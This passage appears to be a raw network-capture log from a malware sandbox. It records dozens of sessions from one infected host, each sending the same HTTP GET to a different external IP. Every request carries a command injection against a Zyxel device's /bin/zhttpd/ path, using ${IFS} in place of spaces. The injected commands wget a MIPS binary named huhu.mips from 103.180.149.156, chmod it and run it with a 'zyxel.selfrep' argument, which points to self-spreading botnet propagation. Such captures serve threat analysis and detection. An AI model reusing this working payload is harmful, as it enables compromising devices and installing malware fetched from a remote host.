                                                        Feb 2, 2024 06:20:56.652833939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1019192.168.2.1455032200.57.205.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652868986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1020192.168.2.1454800216.79.249.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652899981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1021192.168.2.143835836.171.8.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652966976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1022192.168.2.1455338154.43.159.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653001070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1023192.168.2.144023076.239.156.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653042078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1024192.168.2.1452308202.228.7.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653075933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1025192.168.2.145535861.223.224.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653111935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1026192.168.2.145162268.90.230.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653153896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1027192.168.2.1433308115.212.7.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653189898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1028192.168.2.1439878222.22.82.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653239012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1029192.168.2.1460544145.46.124.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653273106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1030192.168.2.1440976195.65.181.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653323889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1031192.168.2.1458702211.2.198.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653343916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1032192.168.2.1439706190.249.139.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653395891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1033192.168.2.145508217.244.104.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653450012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1034192.168.2.14516089.75.203.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653485060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1035192.168.2.1438134204.14.85.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653517008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1036192.168.2.1445602166.149.124.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653543949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1037192.168.2.1442700151.247.240.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653578043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1038192.168.2.1442860213.106.172.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653620958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1039192.168.2.1454224186.52.71.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653678894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1040192.168.2.145960449.204.83.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653700113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1041192.168.2.1458452114.182.31.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653731108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1042192.168.2.144061660.26.152.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653784990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1043192.168.2.143336834.221.42.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653803110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1044192.168.2.1444214151.52.211.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653860092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1045192.168.2.1436126180.217.250.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653898001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1046192.168.2.1442340143.207.146.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653929949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1047192.168.2.1448644180.156.237.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.653966904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1048192.168.2.1444674142.95.39.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654000998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1049192.168.2.1446606116.50.71.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654038906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1050192.168.2.1433778117.243.223.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654074907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1051192.168.2.145654884.49.234.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654103994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1052192.168.2.143624476.139.44.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654156923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1053192.168.2.145610851.65.19.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654202938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1054192.168.2.1432978173.6.113.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654249907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1055192.168.2.146026636.162.94.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654264927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1056192.168.2.1445514211.44.101.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654315948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1057192.168.2.1443846119.212.217.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654340029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1058192.168.2.145871877.132.64.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654393911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1059192.168.2.144651088.238.204.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654431105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1060192.168.2.1444588154.113.58.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654472113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1061192.168.2.1443222136.45.238.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654510975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1062192.168.2.1460570180.198.143.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654546976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1063192.168.2.14368584.98.95.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654587030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1064192.168.2.1447564180.171.253.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654639959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1065192.168.2.1449068144.38.236.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654689074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1066192.168.2.146001624.60.201.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654714108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1067192.168.2.144695072.208.227.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654752016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1068192.168.2.1451496180.118.202.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654791117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1069192.168.2.1450400217.86.117.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654822111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1070192.168.2.143562265.130.18.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654874086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1071192.168.2.1447966219.77.245.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654907942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1072192.168.2.1441246209.75.12.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654953003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1073192.168.2.1443736185.200.40.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.654974937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1074192.168.2.1452940194.105.5.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655030012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1075192.168.2.143356254.139.173.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655077934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1076192.168.2.1457966177.129.121.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655098915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1077192.168.2.1445910152.134.140.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655157089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1078192.168.2.145723091.150.21.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655179024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1079192.168.2.1437396221.182.122.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655229092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1080192.168.2.143549036.245.90.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.655270100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1081192.168.2.143653885.139.209.10443
                                                        TimestampBytes transferredDirectionData
